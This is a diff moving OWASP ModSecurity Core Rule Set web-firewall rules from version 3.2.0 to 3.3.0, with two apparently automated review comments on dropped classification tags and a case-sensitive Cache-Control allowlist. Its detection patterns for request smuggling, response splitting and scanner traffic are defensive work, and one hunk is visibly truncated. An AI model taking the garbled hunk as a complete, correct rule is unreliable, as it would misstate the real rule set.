-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -23,7 +23,7 @@ SecRule REQUEST_LINE "@streq GET /" \
 tag:'language-multi',\
 tag:'platform-apache',\
 tag:'attack-generic',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain"
 SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
 "t:none,\
@@ -43,7 +43,7 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
 tag:'language-multi',\
 tag:'platform-apache',\
 tag:'attack-generic',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain"
 SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \
 "t:none,\
diff --git a/rules/REQUEST-910-IP-REPUTATION.conf b/rules/REQUEST-910-IP-REPUTATION.conf
index b5ef84f1a..afb385529 100644
--- a/rules/REQUEST-910-IP-REPUTATION.conf
+++ b/rules/REQUEST-910-IP-REPUTATION.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -39,8 +39,7 @@ SecRule TX:DO_REPUT_BLOCK "@eq 1" \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- tag:'IP_REPUTATION/MALICIOUS_CLIENT',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain,\
 skipAfter:BEGIN-REQUEST-BLOCKING-EVAL"
@@ -69,7 +68,7 @@ SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule TX:REAL_IP "@geoLookup" \
@@ -123,7 +122,7 @@ SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 skipAfter:END-RBL-LOOKUP"
 #
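Review bot: The `@@ -39,8 +39,7 @@` hunk in REQUEST-910-IP-REPUTATION.conf drops `tag:'IP_REPUTATION/MALICIOUS_CLIENT'` from the rule without anything recording that the tag is gone, and the same silent removal of `OWASP_CRS/...`, `WASCTC/...`, `OWASP_TOP_10/...`, `OWASP_AppSensor/...` and `CAPEC-...` tags repeats in the REQUEST-911, REQUEST-913, REQUEST-920, REQUEST-921 and REQUEST-930 hunks further down. Operator configuration that keys on those tags — `SecRuleRemoveByTag`, `ctl:ruleRemoveTargetByTag`, or log pipelines grouping alerts by tag — will stop matching without any error, and for a remove-by-tag exclusion that means the rule becomes active again and may block traffic the operator had deliberately allowed. Each file header gets a version bump but none of the visible hunks notes the tag removal; a line in the file header, e.g. `# Note: the OWASP_CRS/*, WASCTC/*, OWASP_TOP_10/*, OWASP_AppSensor/* and CAPEC-* tags were removed in 3.3.0; update tag-based exclusions accordingly`, or an entry in the changelog (not part of this diff), would give operators a migration hint. The affected rule bodies start before their hunks, so the rule ids are not visible here.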
@@ -146,7 +145,7 @@ SecRule &TX:block_suspicious_ip "@eq 0" \
 t:none,\
 nolog,\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain,\
 skipAfter:END-RBL-CHECK"
 SecRule &TX:block_harvester_ip "@eq 0" \
@@ -167,7 +166,7 @@ SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.httpbl_msg=%{tx.0}',\
 chain"
 SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. (.*?): .*" \
@@ -187,7 +186,7 @@ SecRule TX:block_search_ip "@eq 1" \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain,\
 skipAfter:END-RBL-CHECK"
@@ -210,7 +209,7 @@ SecRule TX:block_spammer_ip "@eq 1" \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain,\
 skipAfter:END-RBL-CHECK"
@@ -233,7 +232,7 @@ SecRule TX:block_suspicious_ip "@eq 1" \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain,\
 skipAfter:END-RBL-CHECK"
@@ -256,7 +255,7 @@ SecRule TX:block_harvester_ip "@eq 1" \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain,\
 skipAfter:END-RBL-CHECK"
@@ -279,7 +278,7 @@ SecAction \
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'ip.previous_rbl_check=1',\
 expirevar:'ip.previous_rbl_check=86400'"
diff --git a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
index 9b7fe5495..b453f6d46 100644
--- a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
+++ b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -36,12 +36,8 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \
 tag:'attack-generic',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',\
- tag:'WASCTC/WASC-15',\
- tag:'OWASP_TOP_10/A6',\
- tag:'OWASP_AppSensor/RE1',\
 tag:'PCI/12.1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-912-DOS-PROTECTION.conf b/rules/REQUEST-912-DOS-PROTECTION.conf
index 2aab87433..0372ab88e 100644
--- a/rules/REQUEST-912-DOS-PROTECTION.conf
+++ b/rules/REQUEST-912-DOS-PROTECTION.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -69,7 +69,7 @@ SecRule &TX:dos_burst_time_slice "@eq 0" \
 pass,\
 t:none,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain,\
 skipAfter:END-DOS-PROTECTION-CHECKS"
 SecRule &TX:dos_counter_threshold "@eq 0" \
@@ -82,7 +82,7 @@ SecRule &TX:dos_burst_time_slice "@eq 0" \
 pass,\
 t:none,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain,\
 skipAfter:END-DOS-PROTECTION-CHECKS"
 SecRule &TX:dos_counter_threshold "@eq 0" \
@@ -113,7 +113,7 @@ SecRule IP:DOS_BLOCK "@eq 1" \
 tag:'platform-multi',\
 tag:'paranoia-level/1',\
 tag:'attack-dos',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain"
 SecRule &IP:DOS_BLOCK_FLAG "@eq 0" \
 "setvar:'ip.dos_block_counter=+1',\
@@ -137,7 +137,7 @@ SecRule IP:DOS_BLOCK "@eq 1" \
 tag:'platform-multi',\
 tag:'paranoia-level/1',\
 tag:'attack-dos',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'ip.dos_block_counter=+1'"
@@ -159,7 +159,7 @@ SecRule IP:DOS_BLOCK "@eq 1" \
 tag:'platform-multi',\
 tag:'paranoia-level/1',\
 tag:'attack-dos',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 skipAfter:END-DOS-PROTECTION-CHECKS"
@@ -178,7 +178,7 @@ SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \
 tag:'platform-multi',\
 tag:'paranoia-level/1',\
 tag:'attack-dos',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.extension=/%{TX.1}/',\
 chain"
 SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \
@@ -208,7 +208,7 @@ SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \
 tag:'platform-multi',\
 tag:'paranoia-level/1',\
 tag:'attack-dos',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain"
 SecRule &IP:DOS_BURST_COUNTER "@eq 0" \
 "setvar:'ip.dos_burst_counter=1',\
@@ -227,7 +227,7 @@ SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \
 tag:'platform-multi',\
 tag:'paranoia-level/1',\
 tag:'attack-dos',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain"
 SecRule &IP:DOS_BURST_COUNTER "@ge 1" \
 "setvar:'ip.dos_burst_counter=2',\
@@ -252,7 +252,7 @@ SecRule IP:DOS_BURST_COUNTER "@ge 2" \
 tag:'platform-multi',\
 tag:'paranoia-level/1',\
 tag:'attack-dos',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'ip.dos_block=1',\
 expirevar:'ip.dos_block=%{tx.dos_block_timeout}'"
@@ -284,7 +284,7 @@ SecRule IP:DOS_BURST_COUNTER "@ge 1" \
 tag:'platform-multi',\
 tag:'attack-dos',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'ip.dos_block=1',\
 expirevar:'ip.dos_block=%{tx.dos_block_timeout}'"
diff --git a/rules/REQUEST-913-SCANNER-DETECTION.conf b/rules/REQUEST-913-SCANNER-DETECTION.conf
index f4a69f44d..c4ec8034e 100644
--- a/rules/REQUEST-913-SCANNER-DETECTION.conf
+++ b/rules/REQUEST-913-SCANNER-DETECTION.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -44,11 +44,8 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \
 tag:'attack-reputation-scanner',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',\
- tag:'WASCTC/WASC-21',\
- tag:'OWASP_TOP_10/A7',\
 tag:'PCI/6.5.10',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
 setvar:'ip.reput_block_flag=1',\
@@ -69,11 +66,8 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data
 tag:'attack-reputation-scanner',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',\
- tag:'WASCTC/WASC-21',\
- tag:'OWASP_TOP_10/A7',\
 tag:'PCI/6.5.10',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
 setvar:'ip.reput_block_flag=1',\
@@ -96,11 +90,8 @@ SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \
 tag:'attack-reputation-scanner',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',\
- tag:'WASCTC/WASC-21',\
- tag:'OWASP_TOP_10/A7',\
 tag:'PCI/6.5.10',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
 setvar:'ip.reput_block_flag=1',\
@@ -137,12 +128,9 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \
 tag:'platform-multi',\
 tag:'attack-reputation-scripting',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/AUTOMATION/SCRIPTING',\
- tag:'WASCTC/WASC-21',\
- tag:'OWASP_TOP_10/A7',\
 tag:'PCI/6.5.10',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
 setvar:'ip.reput_block_flag=1',\
@@ -173,12 +161,9 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \
 tag:'platform-multi',\
 tag:'attack-reputation-crawler',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/AUTOMATION/CRAWLER',\
- tag:'WASCTC/WASC-21',\
- tag:'OWASP_TOP_10/A7',\
 tag:'PCI/6.5.10',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
 setvar:'ip.reput_block_flag=1',\
diff --git a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
index 4c7935da1..b7dd8ad2b 100644
--- a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+++ b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -57,9 +57,7 @@ SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+
 tag:'attack-protocol',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ',\
- tag:'CAPEC-272',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
@@ -109,9 +107,7 @@ SecRule FILES_NAMES|FILES "@rx (?
+# - max-stale[=]
+# - min-fresh=
+# - no-cache
+# - no-store
+# - no-transform
+# - only-if-cached
+#
+# References:
+# - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control
+# - https://regex101.com/r/CZ0Hxu/22
+#
+SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" "id:920510,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Invalid Cache-Control request header',\
+ logdata:'Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'header-whitelist',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.0',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \
+ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
 SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
@@ -1171,9 +1157,8 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 chain"
 SecRule REQUEST_BASENAME "!@endsWith .pdf" \
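Review bot: The chained allowlist regex for the new rule 920510 is case-sensitive, but RFC 7234 §5.2 defines Cache-Control directives as tokens compared case-insensitively, so a legitimate client sending e.g. `Cache-Control: No-Cache` fails the `!@rx` and takes a CRITICAL anomaly score at paranoia level 1 on every request. A `(?i)` prefix fixes that without widening the allowlist: `SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?i)(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \`. The rule also rejects any extension directive that RFC 7234 §5.2.3 permits, and the `{1,7}` bound rejects an otherwise valid header carrying more than seven directives; if that strictness is intended, a comment above the rule saying so (and that enforcing a header allowlist at PL1 is deliberate) would help whoever triages the resulting false positives. The hunk header and the first comment lines of this hunk are garbled in this rendering, so the leading part of the addition could not be reviewed.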
@@ -1195,9 +1180,8 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 chain"
 SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \
@@ -1216,9 +1200,8 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'"
@@ -1246,12 +1229,9 @@ SecRule &REQUEST_HEADERS:Accept "@eq 0" \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT',\
- tag:'WASCTC/WASC-21',\
- tag:'OWASP_TOP_10/A7',\
 tag:'PCI/6.5.10',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'NOTICE',\
 chain"
 SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \
@@ -1275,9 +1255,8 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1301,12 +1280,9 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA',\
- tag:'WASCTC/WASC-21',\
- tag:'OWASP_TOP_10/A7',\
 tag:'PCI/6.5.10',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'NOTICE',\
 setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'"
@@ -1326,10 +1302,8 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ',\
- tag:'CAPEC-272',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1352,7 +1326,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \
@@ -1384,9 +1358,8 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1412,9 +1385,8 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \
 tag:'platform-windows',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \
@@ -1444,9 +1416,8 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\
 tag:'paranoia-level/4',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 chain"
 SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \
@@ -1471,9 +1442,8 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\
 tag:'paranoia-level/4',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
@@ -1492,9 +1462,8 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\
 tag:'paranoia-level/4',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
@@ -1516,9 +1485,8 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63,
 tag:'platform-multi',\
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\
 tag:'paranoia-level/4',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
@@ -1562,7 +1530,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdegh
 tag:'attack-protocol',\
 tag:'paranoia-level/4',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/REQUEST-921-PROTOCOL-ATTACK.conf
index 70a92e474..78bcfdc91 100644
--- a/rules/REQUEST-921-PROTOCOL-ATTACK.conf
+++ b/rules/REQUEST-921-PROTOCOL-ATTACK.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -44,9 +44,8 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx [\n\r]+(?:get|post|head|options|connect|put|
 tag:'attack-protocol',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/REQUEST_SMUGGLING',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -77,15 +76,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-protocol',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp\/(?:0\.9|1\.[01])|<(?:html|meta)\b)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \
 "id:921130,\
 phase:2,\
 block,\
